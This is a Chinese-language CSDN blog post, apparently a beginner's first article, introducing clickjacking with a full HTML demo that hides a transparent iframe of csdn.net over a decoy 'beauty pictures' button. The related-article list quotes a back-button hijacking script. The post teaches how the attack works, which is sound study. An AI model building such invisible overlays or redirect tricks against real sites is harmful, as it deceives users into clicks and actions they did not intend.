初识Web安全——HTML,CSS点击劫持

最新推荐文章于 2022-10-16 21:57:53 发布
最新推荐文章于 2022-10-16 21:57:53 发布
阅读量329 收藏
点赞数
分类专栏: 网络空间安全 文章标签: 网络安全 css html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tjz991129/article/details/119247080
版权

初识Web安全——HTML,CSS点击劫持

本文主要介绍HTML,CSS存在的一个简单漏洞。在前端语言中单纯的HTML,CSS,JS存在的漏洞是非常少的,只有当这些前端语言混合在一起使用时才会产生很多的漏洞,
下面就是介绍的HTML,CSS混合在一起使用时存在的一个漏洞。所谓点击劫持,简单的来讲就是你打开一个网页你当前点击的内容与你在网页上看都的内容不相符。
具体理解看下方代码:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>点击劫持</title>
    <style>
        iframe {
            width: 1440px;
            height: 900px;
            position: absolute;
            top: -0px;
            left: -0px;
            z-index: 2;
            /* 隐藏网页透明度设置 */
            opacity: 0;
            filter: alpha(opacity=0);
        }

        button {
            position: absolute;
            top: 279px;
            left: 1150px;
            z-index: 1;
            width: 90px;
            height: 40px;
        }
    </style>
</head>

<body>
    <!-- 此程序中这张图片覆盖了隐藏的这个网址 -->
    <button>美女图片</button>
    <img src="./a.png">
    <iframe src="https://www.csdn.net/" scrolling="no"></iframe>
</body>

</html>

代码显示效果
在这里插入图片描述
点击这张图片后得到
在这里插入图片描述
这样点击这张图片就进入了一个新的宁外的一个界面,而没有进入用户希望进入的界面,即为点击劫持。

当然我们也可以将代码中的清晰度调高以便于我们更好的理解,调高后显示结果如下在这里插入图片描述

以上就是所谓的点击劫持,当然还有更加复杂的,但基本原理都是这样。
第一次写博客,写的不是很好,如果有什么错误希望大家告诉我,我一定改正!

&Darker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初识前端,学习html+css.zip
01-02
html css js 知识学习资料 代码 源码 供相关人员学习参考 html css js 知识学习资料 代码 源码 供相关人员学习参考 html css js 知识学习资料 代码 源码 供相关人员学习参考 html css js 知识学习资料 代码 源码 供...
前端面试题知识点
最新发布
melons_G的博客
03-29 993
在router目录下的index.js文件中,对path属性加上/:id。使用router对象的params.id。
怎么劫持html页面,界面操作劫持HTML5安全的图文详解
weixin_34639033的博客
06-04 570
一、界面操作劫持1)ClickJackingClickJacking点击劫持,这是一种视觉上的欺骗。攻击者使用一个透明的、不可见的iframe,覆盖在网页的某个位置上,诱使用户点击iframe。2)TapJacking现在移动设备的使用率越来越高,针对移动设备的特点,衍生出了TapJacking(触屏劫持)。手机上的屏幕范围有限,手机浏览器为了节约空间,可以隐藏地址栏,手机上的视觉欺骗会更加容易实...
Web安全点击劫持 Click Jacking
RexHa的博客
10-16 1012
点击劫持是一种视觉上的欺骗手段。攻击者用一个透明的、不可见的iframe,覆盖在一个网页上,诱使用户在该网页上进行操作,使用户在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以使用户恰好点击在iframe的一些功能性按钮上。通俗的讲,就是你在点击一个“网页”的某个位置时,很可能是点击了隐藏在页面下的某个按钮,从而达到了黑客的某些目的,这对用户来说是不可见的。相对于XSS和CSRF,需要与用户进行交互,实施攻击的成本较高,在网络犯罪中比较少见。
网络和浏览器相关笔记
qq_39279904的博客
03-23 4777
数据链路层 差错控制:crc、奇偶校验 流量控制:停止等待、滑动窗口(停止等待、后退n、选择重传)协议 可靠传输:确认+超时重传 介质访问控制:CSMA,CSMA/CD(边听边发,冲突停发,随机重发),CSMA/CA(预约信道,二进制退避算法) ppp和hdlc区别 交换机: 多接口网桥,全双工通信,隔离冲突域不隔离广播域,即插即用内部的地址表通过自学习算法自动简历,采取存储转发或者直通式方式进行转发。表的内容:mac地址:接口。过程:A从接口1向B发送一帧,查找交换表,查找到:转发;查找不到:记录信息
HTML点击劫持,一种点击劫持的测试方法及装置与流程
weixin_39872334的博客
06-27 952
本发明涉及漏洞防御技术领域,具体地说是一种点击劫持的测试方法及装置。背景技术:点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。该透明的页面可能包含一些危险的动作,比如支付、下载木等,但实际用户并不能看到该透明的页面,而是看到攻击者想要你看到的看似安全的网站。攻击者通...
HTML-css初识.md
01-06
HTML-css初识.md
初识Spring——Spring核心容器
02-24
IOC-InversionofControl,译为控制反转,是一种遵循依赖倒置原则的代码设计思想。所谓依赖倒置,就是把原本的高层建筑依赖底层建筑“倒置”过来,变成底层建筑依赖高层建筑。高层建筑决定需要什么,底层去实现这样的...
CSS劫持攻击
WindrunnerMax
03-24 1816
CSS劫持攻击 CSS劫持是一种并不很受重视的劫持方式,但是其也有一定的危害,且由于其并不一定需要依赖JavaScript,这使得此种攻击方式更容易实现。 ClickJacking点击劫持 当访问某网站时,利用CSS将攻击者实际想让你点击的页面进行透明化隐藏,然后在页面后显示 一些东西诱导让你点击点击后则会在用户毫不知情的情况下做了某些操作,这就是点击劫持ClickJacking。 iframe...
点击劫持ClickJacking+HTML5
zcc1414的专栏
09-25 1166
学习笔记而已 ~~~~~~~~~~~~~~~~~~~~~~~~~~
jquery实现点击劫持代码
虽千万人,吾往矣
03-01 4541
一直在找一个全屏的透明图层点击弹窗代码,虽然没找到,不过有了一些意外的新发现 在浏览百度知道时,发现了jquery可以为div添加onclick事件  代码如下: 1 2 3 4 5 $(function(){ $("div").each(function(){ $(this).click(function(){ alert($(this).text
页面返回劫持代码
weixin_44494569的博客
04-06 2587
window.function(){jp();}; function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());} function jp() { location.href="https://www.baidu.com"; } setTimeout('hh();', 10)...
点击劫持(ClickJacking)
热门推荐
qq_56327824的博客
03-30 1万+
点击劫持(ClickJacking) 什么是点击劫持 点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的,不可见的iframe,覆盖在一个网页上,然后诱导使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱导用户恰巧点击在iframe页面的一些功能性按键上 不懂iframe是干什么的同学,自己补充一下 利用iframe <!DOCTYPE html> <html lang="en"> <head>
html框架注入漏洞iframe,利用CSS注入(无iFrames)窃取CSRF令牌
weixin_36054993的博客
06-08 718
CSS相信大家不会陌生,在百度百科中它的解释是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。那么,它仅仅只是一种用来表示样式的语言吗?当然不是!其实早在几年前,CSS就已被安全研究人员运用于渗透测试当中。这里有一篇文章就为我们详细介绍了一种,使用属性选择器和iFrame,并通过CSS注入来窃取敏感数据的方法。但由于该方法需要iFra...
Web安全点击劫持(ClickJacking)
weixin_33871366的博客
03-06 937
点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义; iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让别人关注它。于是我们准备一个页面: &l...
点击劫持攻防入门
Web分享
01-11 4535
简介 点击劫持(click jacking)也被称为 UI 覆盖攻击。它通过不可见框架底部的内容误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 原理 这种攻击利用了HTML中标签的透明属性。 在 HTML 中,我们可以在 iframe 里面嵌套另一个网页。通过设置 iframe 的透明度,可以使 iframe 不可见,同
浅析点击劫持攻击(转载)
bnrmaster的博客
10-28 1270
转载地址:http://www.freebuf.com/articles/web/67843.html 主要是想做下资料记录,其实看过后就知道原理很简单,先感谢下原作者,如果有侵权等行为,请告知,我会立即删除 点击劫持(click jacking)估计搞安全的都对这四个字不陌生,一句话描述这种劫持:利用社工搭配目标站的不安全配置对用户造成危害。这种漏洞目前在国内
Web 前端页面劫持和反劫持
weixin_34014555的博客
06-12 727
前几天看到一篇写js文件劫持的文章,想起15年主导做百度搜索结果页面反劫持项目做得一些研究,整理成文章,跟大家分享。 常见劫持手段 按照劫持的方法不同,我将劫持分为下面两类: 跳转型劫持:用户输入地址A,但是跳转到地址B 注入型劫持:有别于跳转型型劫持,指通过在正常的网页中注入广告代码(js、iframe等),实现页面弹窗提醒或者底部广告等,又分为下面三个小类: 注入js类劫持:在正常页面...
spark从入门到放弃——初识spark(一)
03-16
以下是我对“spark从入门到放弃——初识spark(一)”的回答: “spark从入门到放弃”是一个非常有趣的话题,而“初识spark(一)”则是其中的第一篇文章。在这篇文章中,作者主要介绍了Spark的基本概念和特点,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值